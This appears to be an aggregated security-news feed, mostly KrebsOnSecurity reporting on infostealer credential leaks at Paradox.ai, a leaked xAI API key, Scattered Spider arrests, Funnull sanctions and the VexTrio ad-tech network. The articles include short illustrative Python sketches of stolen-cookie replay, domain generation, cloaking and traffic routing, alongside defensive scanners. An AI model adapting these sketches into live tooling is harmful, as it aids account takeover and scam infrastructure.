Krebs on Security

Poor Passwords Tattle on AI Hiring Bot Maker Paradox.ai

By: BrianKrebs — July 18th 2025 at 01:23

Security researchers recently revealed that the personal information of millions of people who applied for jobs at McDonald’s was exposed after the researchers guessed the password (“123456”) for the fast food chain’s account at Paradox.ai, a company that makes artificial intelligence-based hiring chatbots used by many Fortune 500 firms. Paradox.ai said the security oversight was an isolated incident that did not affect its other customers, but recent security breaches involving its employees in Vietnam tell a more nuanced story.

A screenshot of the paradox.ai homepage showing its AI hiring chatbot “Olivia” interacting with potential hires.

Earlier this month, security researchers Ian Carroll and Sam Curry wrote about simple methods they found to access the backend of the AI chatbot platform on McHire.com, the McDonald’s website that many of its franchisees use to screen job applicants. As first reported by Wired, the researchers discovered that the weak password used by Paradox exposed 64 million records, including applicants’ names, email addresses and phone numbers.

Paradox.ai acknowledged the researchers’ findings but said the company’s other client instances were not affected, and that no sensitive information — such as Social Security numbers — was exposed.

“We are confident, based on our records, this test account was not accessed by any third party other than the security researchers,” the company wrote in a July 9 blog post. “It had not been logged into since 2019 and frankly, should have been decommissioned. We want to be very clear that while the researchers may have briefly had access to the system containing all chat interactions (NOT job applications), they only viewed and downloaded five chats in total that had candidate information within. Again, at no point was any data leaked online or made public.”

However, a review of stolen password data gathered by multiple breach-tracking services shows that at the end of June 2025, a Paradox.ai administrator in Vietnam suffered a malware compromise on their device that stole usernames and passwords for a variety of internal and third-party online services. The results were not pretty.

The password data from the Paradox.ai developer was stolen by a malware strain known as “Nexus Stealer,” a form grabber and password stealer that is sold on cybercrime forums. The information snarfed by stealers like Nexus is often recovered and indexed by data leak aggregator services like Intelligence X, which reports that the malware on the Paradox.ai developer’s device exposed hundreds of mostly poor and recycled passwords (using the same base password but slightly different characters at the end).

Those purloined credentials show the developer in question at one point used the same seven-digit password to log in to Paradox.ai accounts for a number of Fortune 500 firms listed as customers on the company’s website, including Aramark, Lockheed Martin, Lowes, and Pepsi.

Seven-character passwords, particularly those consisting entirely of numerals, are highly vulnerable to “brute-force” attacks that can try a large number of possible password combinations in quick succession. According to a much-referenced password strength guide maintained by Hive Systems, modern password-cracking systems can crack a seven-digit numeric password more or less instantly.

Image: hivesystems.com.
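
The math behind that guidance is simple to check. Below is a back-of-the-envelope sketch in Python; the guesses-per-second figure is an assumed rate for an offline GPU cracking rig, used for illustration only, and is not taken from the Hive Systems guide.

```python
# Rough brute-force timing estimate. The cracking rate is an assumption.
GUESSES_PER_SECOND = 1e12  # assumed offline GPU rig throughput

def seconds_to_exhaust(alphabet_size: int, length: int) -> float:
    """Time to try every possible password of this length and alphabet."""
    return (alphabet_size ** length) / GUESSES_PER_SECOND

for label, alphabet, length in [
    ("7 digits", 10, 7),                       # all-numeric, like the password above
    ("7 mixed-case letters and digits", 62, 7),
    ("12 mixed-case letters and digits", 62, 12),
]:
    print(f"{label}: {seconds_to_exhaust(alphabet, length):.2e} seconds")

# A 7-digit password has only 10 million candidates (~1e-05 seconds here),
# while 12 random alphanumerics hold out for ~3e+09 seconds (about a century).
```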

In response to questions from KrebsOnSecurity, Paradox.ai confirmed that the password data was recently stolen by a malware infection on the personal device of a longtime Paradox developer based in Vietnam, and said the company was made aware of the compromise shortly after it happened. Paradox maintains that few of the exposed passwords were still valid, and that a majority of them were present on the employee’s personal device only because he had migrated the contents of a password manager from an old computer.

Paradox also pointed out that since 2020 it has required single sign-on (SSO) authentication for its partners, which enforces multi-factor authentication. Still, a review of the exposed passwords shows they included the Vietnamese administrator’s credentials to the company’s SSO platform — paradoxai.okta.com. The password for that account ended in 202506 — possibly a reference to the month of June 2025 — and the digital cookie left behind after a successful Okta login with those credentials says it was valid until December 2025.

Also exposed were the administrator’s credentials and authentication cookies for an account at Atlassian, a platform made for software development and project management. The expiration date for that authentication token likewise was December 2025.

Infostealer infections are among the leading causes of data breaches and ransomware attacks today, and they result in the theft of stored passwords and any credentials the victim types into a browser. Most infostealer malware also will siphon authentication cookies stored on the victim’s device, and depending on how those tokens are configured thieves may be able to use them to bypass login prompts and/or multi-factor authentication.
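
To see why those cookies matter, consider a minimal sketch of cookie replay. Everything here is a placeholder (the cookie name, token value, and URL are invented); the point is that a replayed session token is indistinguishable from one set during a legitimate login, so no password or MFA prompt ever fires.

```python
import requests

# Session token lifted from a victim's browser profile by an infostealer.
# Cookie name, value, and URL are hypothetical.
STOLEN_COOKIE = {"session": "eyJhbGciOi..."}

resp = requests.get(
    "https://intranet.example.com/dashboard",
    cookies=STOLEN_COOKIE,  # replayed as-is: no credentials, no MFA challenge
    timeout=10,
)

# Unless the token has expired or been revoked server-side, the server
# returns the logged-in view, exactly as the victim would see it.
print(resp.status_code)
```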

Quite often these infostealer infections will open a backdoor on the victim’s device that allows attackers to access the infected machine remotely. Indeed, it appears that remote access to the Paradox administrator’s compromised device was offered for sale recently.

In February 2019, Paradox.ai announced it had successfully completed audits for two fairly comprehensive security standards (ISO 27001 and SOC 2 Type II). Meanwhile, the company’s security disclosure this month says the test account with the atrocious 123456 username and password was last accessed in 2019, but was somehow missed in the company’s annual penetration tests. So how did it manage to pass such stringent security audits with these practices in place?

Paradox.ai told KrebsOnSecurity that at the time of the 2019 audit, the company’s various contractors were not held to the same security standards the company practices internally. Paradox emphasized that this has changed, and that it has updated its security and password requirements multiple times since then.

It is unclear how the Paradox developer in Vietnam infected his computer with malware, but a closer review finds that a Windows device belonging to another Paradox.ai employee in Vietnam was compromised by similar data-stealing malware at the end of 2024 (that compromise included the victim’s GitHub credentials). In the case of both employees, the stolen credential data includes Web browser logs indicating the victims repeatedly downloaded pirated movies and television shows, which are often bundled with malware disguised as a video codec needed to view the pirated content.

Krebs on Security

DOGE Denizen Marko Elez Leaked API Key for xAI

By: BrianKrebs — July 15th 2025 at 01:23

Marko Elez, a 25-year-old employee at Elon Musk’s Department of Government Efficiency (DOGE), has been granted access to sensitive databases at the U.S. Social Security Administration, the Treasury and Justice departments, and the Department of Homeland Security. So it should fill all Americans with a deep sense of confidence to learn that Mr. Elez over the weekend inadvertently published a private key that allowed anyone to interact directly with more than four dozen large language models (LLMs) developed by Musk’s artificial intelligence company xAI.

Image: Shutterstock, @sdx15.

On July 13, Mr. Elez committed a script to GitHub called “agent.py” that included a private application programming interface (API) key for xAI. The inclusion of the private key was first flagged by GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.
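
Secret scanners of this kind generally combine pattern matching with a randomness test, flagging strings that look like vendor-issued tokens. The sketch below illustrates the idea only; the regular expression and the sample key are invented, and do not reflect GitGuardian’s actual detection rules or xAI’s real key format.

```python
import math
import re

# Generic "vendor-prefixed token" shape: short alphabetic prefix, hyphen,
# then a long alphanumeric body. Purely illustrative.
TOKEN_RE = re.compile(r"\b[A-Za-z]{2,8}-[A-Za-z0-9]{24,}\b")

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random tokens score high."""
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

def find_candidate_secrets(source: str, min_entropy: float = 3.5):
    for match in TOKEN_RE.finditer(source):
        if shannon_entropy(match.group(0)) >= min_entropy:
            yield match.group(0)

# Hypothetical leaked key embedded in committed code:
snippet = 'client = Client(api_key="xai-Zm9vYmFyYmF6cXV4MTIzNDU2Nzg5MA")'
print(list(find_candidate_secrets(snippet)))
```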

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, said the exposed API key allowed access to at least 52 different LLMs used by xAI. The most recent LLM in the list was called “grok-4-0709” and was created on July 9, 2025.

Grok, the generative AI chatbot developed by xAI and integrated into Twitter/X, relies on these and other LLMs (a query to Grok before publication shows Grok currently uses Grok-3, which was launched in February 2025). Earlier today, xAI announced that the Department of Defense will begin using Grok as part of a contract worth up to $200 million. The contract award came less than a week after Grok began spewing antisemitic rants and invoking Adolf Hitler.

Mr. Elez did not respond to a request for comment. The code repository containing the private xAI key was removed shortly after Caturegli notified Elez via email. However, Caturegli said the exposed API key still works and has not yet been revoked.

“If a developer can’t keep an API key private, it raises questions about how they’re handling far more sensitive government information behind closed doors,” Caturegli told KrebsOnSecurity.

Prior to joining DOGE, Marko Elez worked for a number of Musk’s companies. His DOGE career began at the Department of the Treasury, and a legal battle over DOGE’s access to Treasury databases showed Elez was sending unencrypted personal information in violation of the agency’s policies.

While still at Treasury, Elez resigned after The Wall Street Journal linked him to social media posts that advocated racism and eugenics. When Vice President J.D. Vance lobbied for Elez to be rehired, President Trump agreed and Musk reinstated him.

Since his re-hiring as a DOGE employee, Elez has been granted access to databases at one federal agency after another. TechCrunch reported in February 2025 that he was working at the Social Security Administration. In March, Business Insider found Elez was part of a DOGE detachment assigned to the Department of Labor.

Marko Elez, in a photo from a social media profile.

In April, The New York Times reported that Elez held positions at the U.S. Customs and Border Protection and the Immigration and Customs Enforcement (ICE) bureaus, as well as the Department of Homeland Security. The Washington Post later reported that Elez, while serving as a DOGE advisor at the Department of Justice, had gained access to the Executive Office for Immigration Review’s Courts and Appeals System (EACS).

Elez is not the first DOGE worker to publish internal API keys for xAI: In May, KrebsOnSecurity detailed how another DOGE employee leaked a private xAI key on GitHub for two months, exposing LLMs that were custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X.

Caturegli said it’s difficult to trust someone with access to confidential government systems when they can’t even manage the basics of operational security.

“One leak is a mistake,” he said. “But when the same type of sensitive key gets exposed again and again, it’s not just bad luck, it’s a sign of deeper negligence and a broken security culture.”

Krebs on Security

UK Arrests Four in ‘Scattered Spider’ Ransom Group

By: BrianKrebs — July 10th 2025 at 17:31

Authorities in the United Kingdom this week arrested four people aged 17 to 20 in connection with recent data theft and extortion attacks against the retailers Marks & Spencer and Harrods, and the British food retailer Co-op Group. The breaches have been linked to a prolific but loosely-affiliated cybercrime group dubbed “Scattered Spider,” whose other recent victims include multiple airlines.

The U.K.’s National Crime Agency (NCA) declined to verify the names of those arrested, saying only that they included two males aged 19, another male aged 17, and a 20-year-old female.

Scattered Spider is the name given to an English-speaking cybercrime group known for using social engineering tactics to break into companies and steal data for ransom, often impersonating employees or contractors to deceive IT help desks into granting access. The FBI warned last month that Scattered Spider had recently shifted to targeting companies in the retail and airline sectors.

KrebsOnSecurity has learned the identities of two of the suspects. Multiple sources close to the investigation said those arrested include Owen David Flowers, a U.K. man alleged to have been involved in the cyber intrusion and ransomware attack that shut down several MGM Casino properties in September 2023. Those same sources said the woman arrested is or recently was in a relationship with Flowers.

Sources told KrebsOnSecurity that Flowers, who allegedly went by the hacker handles “bo764,” “Holy,” and “Nazi,” was the group member who anonymously gave interviews to the media in the days after the MGM hack. His real name was omitted from a September 2024 story about the group because he was not yet charged in that incident.

The bigger fish arrested this week is 19-year-old Thalha Jubair, a U.K. man whose alleged exploits under various monikers have been well-documented in stories on this site. Jubair is believed to have used the nickname “Earth2Star,” which corresponds to a founding member of the cybercrime-focused Telegram channel “Star Fraud Chat.”

In 2023, KrebsOnSecurity published an investigation into the work of three different SIM-swapping groups that phished credentials from T-Mobile employees and used that access to offer a service whereby any T-Mobile phone number could be swapped to a new device. Star Chat was by far the most active and consequential of the three SIM-swapping groups, which collectively broke into T-Mobile’s network more than 100 times in the second half of 2022.

Jubair allegedly used the handles “Earth2Star” and “Star Ace,” and was a core member of a prolific SIM-swapping group operating in 2022. Star Ace posted this image to the Star Fraud chat channel on Telegram, and it lists various prices for SIM-swaps.

Sources tell KrebsOnSecurity that Jubair also was a core member of the LAPSUS$ cybercrime group that broke into dozens of technology companies in 2022, stealing source code and other internal data from tech giants including Microsoft, Nvidia, Okta, Rockstar Games, Samsung, T-Mobile, and Uber.

In April 2022, KrebsOnSecurity published internal chat records from LAPSUS$, and those chats indicated Jubair was using the nicknames Amtrak and Asyntax. At one point in the chats, Amtrak told the LAPSUS$ group leader not to share T-Mobile’s logo in images sent to the group because he’d been previously busted for SIM-swapping and his parents would suspect he was back at it again.

As shown in those chats, the leader of LAPSUS$ eventually decided to betray Amtrak by posting his real name, phone number, and other hacker handles into a public chat room on Telegram.

In March 2022, the leader of the LAPSUS$ data extortion group exposed Thalha Jubair’s name and hacker handles in a public chat room on Telegram.

That story about the leaked LAPSUS$ chats connected Amtrak/Asyntax/Jubair to the identity “Everlynn,” the founder of a cybercriminal service that sold fraudulent “emergency data requests” targeting the major social media and email providers. In such schemes, the hackers compromise email accounts tied to police departments and government agencies, and then send unauthorized demands for subscriber data while claiming the information being requested can’t wait for a court order because it relates to an urgent matter of life and death.

The roster of the now-defunct “Infinity Recursion” hacking team, from which some members of LAPSUS$ hail.

Sources say Jubair also used the nickname “Operator,” and that until recently he was the administrator of the Doxbin, a long-running and highly toxic online community that is used to “dox” or post deeply personal information on people. In May 2024, several popular cybercrime channels on Telegram ridiculed Operator after it was revealed that he’d staged his own kidnapping in a botched plan to throw off law enforcement investigators.

In November 2024, U.S. authorities charged five men aged 20 to 25 in connection with the Scattered Spider group, which has long relied on recruiting minors to carry out its most risky activities. Indeed, many of the group’s core members were recruited from online gaming platforms like Roblox and Minecraft in their early teens, and have been perfecting their social engineering tactics for years.

“There is a clear pattern that some of the most depraved threat actors first joined cybercrime gangs at an exceptionally young age,” said Allison Nixon, chief research officer at the New York-based security firm Unit 221B. “Cybercriminals arrested at 15 or younger need serious intervention and monitoring to prevent a years-long massive escalation.”

Security – Cisco Blog

Cisco Catalyst 8300 Excels in NetSecOPEN NGFW SD-WAN Security Tests

By: Hugo Vliegen — July 10th 2025 at 12:00
Cisco Catalyst 8300 earns NetSecOPEN certification for exceptional real-world NGFW and SD-WAN performance under modern enterprise conditions.
Krebs on Security

Big Tech’s Mixed Response to U.S. Treasury Sanctions

By: BrianKrebs — July 3rd 2025 at 16:06

In May 2025, the U.S. government sanctioned a Chinese national for operating a cloud provider linked to the majority of virtual currency investment scam websites reported to the FBI. But a new report finds the accused continues to operate a slew of established accounts at American tech companies — including Facebook, GitHub, PayPal and Twitter/X.

On May 29, the U.S. Department of the Treasury announced economic sanctions against Funnull Technology Inc., a Philippines-based company alleged to provide infrastructure for hundreds of thousands of websites involved in virtual currency investment scams known as “pig butchering.” In January 2025, KrebsOnSecurity detailed how Funnull was designed as a content delivery network that catered to foreign cybercriminals seeking to route their traffic through U.S.-based cloud providers.

The Treasury also sanctioned Funnull’s alleged operator, a 40-year-old Chinese national named Liu “Steve” Lizhi. The government says Funnull directly facilitated financial schemes resulting in more than $200 million in financial losses by Americans, and that the company’s operations were linked to the majority of pig butchering scams reported to the FBI.

It is generally illegal for U.S. companies or individuals to transact with people sanctioned by the Treasury. However, as Mr. Lizhi’s case makes clear, just because someone is sanctioned doesn’t necessarily mean big tech companies are going to suspend their online accounts.

The government says Lizhi was born November 13, 1984, and used the nicknames “XXL4” and “Nice Lizhi.” Nevertheless, Steve Liu’s 17-year-old account on LinkedIn (in the name “Liulizhi”) had hundreds of followers (Lizhi’s LinkedIn profile helpfully confirms his birthday) until quite recently: The account was deleted this morning, just hours after KrebsOnSecurity sought comment from LinkedIn.

Mr. Lizhi’s LinkedIn account was suspended sometime in the last 24 hours, after KrebsOnSecurity sought comment from LinkedIn.

In an emailed response, a LinkedIn spokesperson said the company’s “Prohibited countries policy” states that LinkedIn “does not sell, license, support or otherwise make available its Premium accounts or other paid products and services to individuals and companies sanctioned by the U.S. government.” LinkedIn declined to say whether the profile in question was a premium or free account.

Mr. Lizhi also maintains a working PayPal account under the name Liu Lizhi and username “@nicelizhi,” another nickname listed in the Treasury sanctions. A 15-year-old Twitter/X account named “Lizhi” that links to Mr. Lizhi’s personal domain remains active, although it has few followers and hasn’t posted in years.

These accounts and many others were flagged by the security firm Silent Push, which has been tracking Funnull’s operations for the past year and calling out U.S. cloud providers like Amazon and Microsoft for failing to more quickly sever ties with the company.

Liu Lizhi’s PayPal account.

In a report released today, Silent Push found Lizhi still operates numerous Facebook accounts and groups, including a private Facebook account under the name Liu Lizhi. Another Facebook account clearly connected to Lizhi is a tourism page for Ganzhou, China called “EnjoyGanzhou” that was named in the Treasury Department sanctions.

“This guy is the technical administrator for the infrastructure that is hosting a majority of scams targeting people in the United States, and hundreds of millions have been lost based on the websites he’s been hosting,” said Zach Edwards, senior threat researcher at Silent Push. “It’s crazy that the vast majority of big tech companies haven’t done anything to cut ties with this guy.”

The FBI says it received nearly 150,000 complaints last year involving digital assets and $9.3 billion in losses — a 66 percent increase from the previous year. Investment scams were the top crypto-related crimes reported, with $5.8 billion in losses.

In a statement, a Meta spokesperson said the company continuously takes steps to meet its legal obligations, but that sanctions laws are complex and varied. They explained that sanctions are often targeted in nature and don’t always prohibit people from having a presence on its platform. Nevertheless, Meta confirmed it had removed the account, unpublished Pages, and removed Groups and events associated with the user for violating its policies.

Attempts to reach Mr. Lizhi via his primary email addresses at Hotmail and Gmail bounced as undeliverable. Likewise, his 14-year-old YouTube channel appears to have been taken down recently.

However, anyone interested in viewing or using Mr. Lizhi’s 146 computer code repositories will have no problem finding GitHub accounts for him, including one registered under the NiceLizhi and XXL4 nicknames mentioned in the Treasury sanctions.

One of multiple GitHub profiles used by Liu “Steve” Lizhi, who uses the nickname XXL4 (a moniker listed in the Treasury sanctions for Mr. Lizhi).

Mr. Lizhi also operates a GitHub page for an open source e-commerce platform called NexaMerchant, which advertises itself as a payment gateway working with numerous American financial institutions. Interestingly, this profile’s “followers” page shows several other accounts that appear to be Mr. Lizhi’s. All of the account’s followers are tagged as “suspended,” even though that suspended message does not display when one visits those individual profiles.

In response to questions, GitHub said it has a process in place to identify when users and customers are Specially Designated Nationals or other denied or blocked parties, but that it locks those accounts instead of removing them. According to its policy, GitHub takes care that users and customers aren’t impacted beyond what is required by law.

All of the follower accounts for the XXL4 GitHub account appear to be Mr. Lizhi’s, and have been suspended by GitHub, but their code is still accessible.

“This includes keeping public repositories, including those for open source projects, available and accessible to support personal communications involving developers in sanctioned regions,” the policy states. “This also means GitHub will advocate for developers in sanctioned regions to enjoy greater access to the platform and full access to the global open source community.”

Edwards said it’s great that GitHub has a process for handling sanctioned accounts, but that the process doesn’t seem to communicate risk in a transparent way, noting that the only indicator on the locked accounts is the message, “This repository has been archived by the owner. It is now read-only.”

“It’s an odd message that doesn’t communicate, ‘This is a sanctioned entity, don’t fork this code or use it in a production environment’,” Edwards said.

Mark Rasch is a former federal cybercrime prosecutor who now serves as counsel for the New York City-based security consulting firm Unit 221B. Rasch said when Treasury’s Office of Foreign Assets Control (OFAC) sanctions a person or entity, it then becomes illegal for businesses or organizations to transact with the sanctioned party.

Rasch said financial institutions have very mature systems for severing accounts tied to people who become subject to OFAC sanctions, but that tech companies may be far less proactive — particularly with free accounts.

“Banks have established ways of checking [U.S. government sanctions lists] for sanctioned entities, but tech companies don’t necessarily do a good job with that, especially for services that you can just click and sign up for,” Rasch said. “It’s potentially a risk and liability for the tech companies involved, but only to the extent OFAC is willing to enforce it.”

Liu Lizhi operates numerous Facebook accounts and groups, including this one for an entity specified in the OFAC sanctions: The “Enjoy Ganzhou” tourism page for Ganzhou, China. Image: Silent Push.

In July 2024, Funnull purchased the domain polyfill[.]io, the longtime home of a legitimate open source project that allowed websites to ensure that devices using legacy browsers could still render content in newer formats. After the Polyfill domain changed hands, at least 384,000 websites were caught in a supply-chain attack that redirected visitors to malicious sites. According to the Treasury, Funnull used the code to redirect people to scam websites and online gambling sites, some of which were linked to Chinese criminal money laundering operations.
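
One defensive takeaway for site owners is to audit which third-party hosts their pages still load scripts from. Below is a rough sketch of such a check using only the standard library; the flagged hostnames are the obvious ones from this incident, and a production scanner would also need to handle dynamically injected tags, iframes, and redirects.

```python
import re
import urllib.request

# Domains known to have changed hands; extend as needed.
FLAGGED_HOSTS = {"polyfill.io", "cdn.polyfill.io"}
SCRIPT_SRC_RE = re.compile(r'<script[^>]+src=["\']([^"\']+)', re.IGNORECASE)

def flag_risky_scripts(url: str):
    """Yield script URLs on the page that point at flagged hosts."""
    html = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
    for src in SCRIPT_SRC_RE.findall(html):
        if any(host in src for host in FLAGGED_HOSTS):
            yield src

# Usage against a hypothetical site:
# for src in flag_risky_scripts("https://www.example.com/"):
#     print("loads script from flagged domain:", src)
```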

The U.S. government says Funnull provides domain names for websites on its purchased IP addresses, using domain generation algorithms (DGAs) — programs that generate large numbers of similar but unique names for websites — and that it sells web design templates to cybercriminals.

“These services not only make it easier for cybercriminals to impersonate trusted brands when creating scam websites, but also allow them to quickly change to different domain names and IP addresses when legitimate providers attempt to take the websites down,” reads a Treasury statement.
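
At its simplest, a DGA is a seeded, deterministic generator: anyone running the same code with the same seed derives the same list of domains, so scam infrastructure can rotate names on a schedule without any coordination channel. The sketch below is a generic textbook-style construction, not Funnull’s actual algorithm.

```python
import hashlib

def generate_domains(seed: str, count: int, tld: str = ".top") -> list[str]:
    """Derive a deterministic batch of domain labels from a seed."""
    domains = []
    state = seed.encode()
    for _ in range(count):
        state = hashlib.sha256(state).digest()
        # Map the first 12 hash bytes to lowercase letters.
        label = "".join(chr(ord("a") + b % 26) for b in state[:12])
        domains.append(label + tld)
    return domains

# Rotating the seed (here, by date) yields a fresh but predictable batch,
# which is why takedowns of individual domains barely slow operators down.
print(generate_domains("2025-07-03", 5))
```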

Meanwhile, Funnull appears to be morphing nearly all aspects of its business in the wake of the sanctions, Edwards said.

“Whereas before they might have used 60 DGA domains to hide and bounce their traffic, we’re seeing far more now,” he said. “They’re trying to make their infrastructure harder to track and more complicated, so for now they’re not going away but more just changing what they’re doing. And a lot more organizations should be holding their feet to the fire.”

Update, 2:48 PM ET: Added response from Meta, which confirmed it has closed the accounts and groups connected to Mr. Lizhi.

Update, July 7, 6:56 p.m. ET: In a written statement, PayPal said it continually works to combat and prevent the illicit use of its services.

“We devote significant resources globally to financial crime compliance, and we proactively refer cases to and assist law enforcement officials around the world in their efforts to identify, investigate and stop illegal activity,” the statement reads.

Security – Cisco Blog

Cisco Live San Diego Case Study: Malware Upatre! (Encrypted Visibility Engine Event)

By: Aditya Sankar — July 2nd 2025 at 12:00
Cisco Security and Splunk protected Cisco Live San Diego 2025 in the Security Operations Center. Learn about the latest innovations for the SOC of the Future.
Security – Cisco Blog

Splunk in Action at the Cisco Live San Diego SOC

By: Jessica (Bair) Oppenheimer — July 2nd 2025 at 12:00
Cisco Security and Splunk protected Cisco Live San Diego 2025 in the Security Operations Center. Learn about the latest innovations for the SOC of the Future.
Security – Cisco Blog

Using AI to Battle Phishing Campaigns

By: Ryan Maclennan — July 2nd 2025 at 12:00
Cisco Security and Splunk protected Cisco Live San Diego 2025 in the Security Operations Center. Learn about the latest innovations for the SOC of the Future.
Security – Cisco Blog

Building an XDR Integration With Splunk Attack Analyzer

By: Ryan Maclennan — July 2nd 2025 at 12:00
Cisco XDR is an infinitely extensible platform for security integrations. Like the maturing SOCs of our customers, the event SOC team at Cisco Live San Diego 2025 built custom integrations to meet our needs. You can build your own integrations using the community resources announced at Cisco Live. It was an honor to work with […]
Security – Cisco Blog

Cisco Live San Diego Case Study: Hunting Cleartext Passwords in HTTP POST Requests

By: Aditya Sankar — July 2nd 2025 at 12:00
Cisco Security and Splunk protected Cisco Live San Diego 2025 in the Security Operations Center. Learn about the latest innovations for the SOC of the Future. 
Security – Cisco Blog

Secure Endpoint Enhancements Elevate Cisco XDR and Breach Protection Suite

By: Katie Webster — June 30th 2025 at 12:00
Discover how Secure Endpoint enhancements elevate Cisco XDR and the Breach Protection Suite with better visibility and advanced threat defense.
WIRED

Minnesota Shooting Suspect Allegedly Used Data Broker Sites to Find Targets’ Addresses

By: Lily Hay Newman — June 17th 2025 at 02:24
The shooter allegedly researched several “people search” sites in an attempt to target his victims, highlighting the potential dangers of widely available personal data.
Security – Cisco Blog

XDR still means so much more than some may realize

By: Briana Farro — June 16th 2025 at 12:00
Cisco has been named a Leader and Fast Mover in GigaOm's Radar for Extended Detection and Response (XDR). Learn what sets Cisco XDR apart in our blog.
Krebs on Security

Inside a Dark Adtech Empire Fed by Fake CAPTCHAs

By: BrianKrebs — June 12th 2025 at 22:14

Late last year, security researchers made a startling discovery: Kremlin-backed disinformation campaigns were bypassing moderation on social media platforms by leveraging the same malicious advertising technology that powers a sprawling ecosystem of online hucksters and website hackers. A new report on the fallout from that investigation finds this dark ad tech industry is far more resilient and incestuous than previously known.

Image: Infoblox.

In November 2024, researchers at the security firm Qurium published an investigation into “Doppelganger,” a disinformation network that promotes pro-Russian narratives and infiltrates Europe’s media landscape by pushing fake news through a network of cloned websites.

Doppelganger campaigns use specialized links that bounce the visitor’s browser through a long series of domains before the fake news content is served. Qurium found Doppelganger relies on a sophisticated “domain cloaking” service, a technology that allows websites to present different content to search engines compared to what regular visitors see. The use of cloaking services helps the disinformation sites remain online longer than they otherwise would, while ensuring that only the targeted audience gets to view the intended content.
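
At its core, cloaking is a server-side branch on who appears to be asking. The toy HTTP server below illustrates the concept with a crude User-Agent check; real cloaking services fingerprint far more than this (IP reputation, geolocation, TLS characteristics), so treat this strictly as a sketch of the idea.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

CRAWLER_MARKERS = ("googlebot", "bingbot", "yandexbot")

class CloakingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        ua = self.headers.get("User-Agent", "").lower()
        if any(marker in ua for marker in CRAWLER_MARKERS):
            # Search engines and scanners see a harmless placeholder.
            body = b"<html><body>Welcome to our gardening blog!</body></html>"
        else:
            # Regular visitors get the content the operator actually intends.
            body = b"<html><body>Targeted content served here.</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body)

# HTTPServer(("127.0.0.1", 8080), CloakingHandler).serve_forever()
```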

Qurium discovered that Doppelganger’s cloaking service also promoted online dating sites, and shared much of the same infrastructure with VexTrio, which is thought to be the oldest malicious traffic distribution system (TDS) in existence. While TDSs are commonly used by legitimate advertising networks to manage traffic from disparate sources and to track who or what is behind each click, VexTrio’s TDS largely manages web traffic from victims of phishing, malware, and social engineering scams.
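
A TDS, in turn, can be thought of as a click router: it classifies each incoming visitor from request metadata, picks a destination from the current inventory of “offers,” and records the click for per-affiliate accounting. The hypothetical sketch below shows the shape of that logic; all field names and destinations are invented.

```python
import random

# Invented inventory of destinations, keyed by traffic bucket.
DESTINATIONS = {
    "mobile": ["https://dating-offer.example", "https://sweepstakes.example"],
    "desktop": ["https://fake-update.example"],
    "crawler": ["https://benign-landing.example"],
}

def route_click(user_agent: str, referrer: str) -> str:
    """Pick a destination for one click and log it for affiliate payouts."""
    ua = user_agent.lower()
    if "bot" in ua or "spider" in ua:
        bucket = "crawler"   # keep scanners away from the real payloads
    elif "android" in ua or "iphone" in ua:
        bucket = "mobile"
    else:
        bucket = "desktop"
    destination = random.choice(DESTINATIONS[bucket])
    print(f"click via {referrer!r} -> {destination}")  # accounting record
    return destination
```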

BREAKING BAD

Digging deeper, Qurium noticed Doppelganger’s cloaking service used an Internet provider in Switzerland as the first entry point in a chain of domain redirections. They also noticed the same infrastructure hosted a pair of co-branded affiliate marketing services that were driving traffic to sketchy adult dating sites: LosPollos[.]com and TacoLoco[.]co.

The LosPollos ad network incorporates many elements and references from the hit series “Breaking Bad,” mirroring the fictional “Los Pollos Hermanos” restaurant chain that served as a money laundering operation for a violent methamphetamine cartel.

The LosPollos advertising network invokes characters and themes from the hit show Breaking Bad. The logo for LosPollos (upper left) is the image of Gustavo Fring, the fictional chicken restaurant chain owner in the show.

Affiliates who sign up with LosPollos are given JavaScript-heavy “smartlinks” that drive traffic into the VexTrio TDS, which in turn distributes the traffic among a variety of advertising partners, including dating services, sweepstakes offers, bait-and-switch mobile apps, financial scams and malware download sites.

LosPollos affiliates typically stitch these smart links into WordPress websites that have been hacked via known vulnerabilities, and those affiliates will earn a small commission each time an Internet user referred by any of their hacked sites falls for one of these lures.

The Los Pollos advertising network promoting itself on LinkedIn.

According to Qurium, TacoLoco is a traffic monetization network that uses deceptive tactics to trick Internet users into enabling “push notifications,” a cross-platform browser standard that allows websites to show pop-up messages which appear outside of the browser. For example, on Microsoft Windows systems these notifications typically show up in the bottom right corner of the screen — just above the system clock.

In the case of VexTrio and TacoLoco, the notification approval requests themselves are deceptive — disguised as “CAPTCHA” challenges designed to distinguish automated bot traffic from real visitors. For years, VexTrio and its partners have successfully tricked countless users into enabling these site notifications, which are then used to continuously pepper the victim’s device with a variety of phony virus alerts and misleading pop-up messages.

Examples of VexTrio landing pages that lead users to accept push notifications on their device.

According to a December 2024 annual report from GoDaddy, nearly 40 percent of compromised websites in 2024 redirected visitors to VexTrio via LosPollos smartlinks.

ADSPRO AND TEKNOLOGY

On November 14, 2024, Qurium published research to support its findings that LosPollos and TacoLoco were services operated by Adspro Group, a company registered in the Czech Republic and Russia, and that Adspro runs its infrastructure at the Swiss hosting providers C41 and Teknology SA.

Qurium noted the LosPollos and TacoLoco sites state that their content is copyrighted by ByteCore AG and SkyForge Digital AG, both Swiss firms that are run by the owner of Teknology SA, Giulio Vitorrio Leonardo Cerutti. Further investigation revealed LosPollos and TacoLoco were apps developed by a company called Holacode, which lists Cerutti as its CEO.

The apps marketed by Holacode include numerous VPN services, as well as one called Spamshield that claims to stop unwanted push notifications. But in January, Infoblox said they tested the app on their own mobile devices, and found it hides the user’s notifications, and then after 24 hours stops hiding them and demands payment. Spamshield subsequently changed its developer name from Holacode to ApLabz, although Infoblox noted that the terms of service for several of the rebranded ApLabz apps still referenced Holacode.

Incredibly, Cerutti threatened to sue me for defamation before I’d even uttered his name or sent him a request for comment (Cerutti sent the unsolicited legal threat back in January after his company and my name were merely tagged in an Infoblox post on LinkedIn about VexTrio).

